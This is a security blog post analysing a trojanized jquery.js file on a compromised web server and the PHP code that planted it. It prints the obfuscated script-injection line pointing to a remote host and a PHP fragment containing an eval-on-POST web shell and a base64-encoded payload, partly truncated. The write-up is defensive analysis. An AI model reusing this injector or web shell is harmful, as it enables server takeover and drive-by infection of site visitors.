Code injection from within

Recently, we stumbled upon a strange Javascript file; at first sight, it looked like a totally legitimate, clean file. The file name is jquery.js and has all the characteristics of a proper jquery file. Even the header was kept:

/*
* jQuery JavaScript Library v1.3.1
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-01-21 20:42:16 -0500 (Wed, 21 Jan 2009)
* Revision: 6158
*/

jquery is a popular javascript library used as said on the homepage (http://jquery.com/) “to simplify HTML document traversing, event handling, animating, and Ajax interactions for rapid web development.”

But something caught our attention, an “unescape” sequence in this code used to hide something:

document.write(unescape(‘fq%3CssoWcOTHriDpgpsoWt%20sOTHrc%3DOTHhDpgtsoWtDpgp:%2F%2F94soW%2EVV24Rp7%2E2Rp%2E19U6k5%2FneU6kwsfq%2F?iVVd%3Dfq1fq0RpZ%3E%3C%2FH5rscDpgrRpiptRp%3E’).replace(/soW|VV|U6k|rV|fq|OTH|H5r|Dpg|Rp/g,”").replace(/Z/,navigator.appName.charAt(0)==’M'?’0′:’1′));

The unescape argument contains garbage that, once “cleaned” by the first “replace” method call, reveals the following code:

<script src=http://94.247.xxx.xxx/news/?id=10Z>/script>

The second replace call is used to check the browser editor (Netscape or Microsoft), and replace ‘Z’ char in the previous code with 0 or 1 depending on the test. So the dynamically injected code depends on the target browser editor.

Unsurprisingly, this code turned out to be a XOR obfuscated script that embeds links to malicious PDF file and malicious FLASH file targeting some vulnerabilities that have been disclosed recently. So if the targeted computer third party tools were not up to date, there is a high risk that the computer will be infected after visiting this url.

Nothing new, you will say? Perhaps. Yet what is interesting in this case is that this infection of a legitimate javascript file happened right on the server. Indeed, we found the PHP code used to corrupt this Javascript file. In order to run and accomplish its malicious task, this PHP piece of code has to be uploaded on the targeted web server. PHP code server injection is a relatively common attack, usually meant to push a “PHP Shell” onto a server to take control of it. It is achieved via various techniques, such as remote file inclusion, image or avatar uploading, etc… There was a valuable article on PHP Shells at PhishLabs some time ago.

{if(isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);
if(!defined(‘TMP_XHGFJOKL’))
define(‘TMP_XHGFJOKL’,base64_decode(‘PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCm
RvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NGT3Njeno4ckNwaXB0Q3AlMjBzeno4cjF6YyUzRCU yRjF6JTJGOTF4NCUyRVYwbjJGTzQ3JTJFMjF4JTJFQ3AxOTUxeiUyRmpWMG5xeno4dTF6ZTF4cjJu
SnkxeCUyRTJuSmpzJTNFJTNDJTJGc2NyaVYwbnB6ejh0Rk8lM0UnKS5yZXBsYWNlKC9GT3wybkp8MXp8Q3B 8eno4fFYwbnwxeC9nLCIiKSk7CiAtLT48L3NjcmlwdD4=’));
function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));
if(preg_match_all(‘##','',$s);
if(stristr($s,'
elseif(($s1!=$s)||stristr($s,''))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])
call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;
else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');
for($i=0;$i

This rather clever piece of PHP code essentially scans server files for 'script' tags, and once found, injects here the malicious piece we identified above in jquery.js. Thereby turning visitors of the web server into potential Zombies, cash cows, or whatever else can be done to a trojanized computer.

To put it in a nutshell, the code injection chain is the following: a cybercriminal injects PHP code into a webserver, which injects javascript code into all local files, which injects remote dynamic script into all visitors browsers, which loads malicious documents, which inject Trojan files into their computer, which milk the targeted user.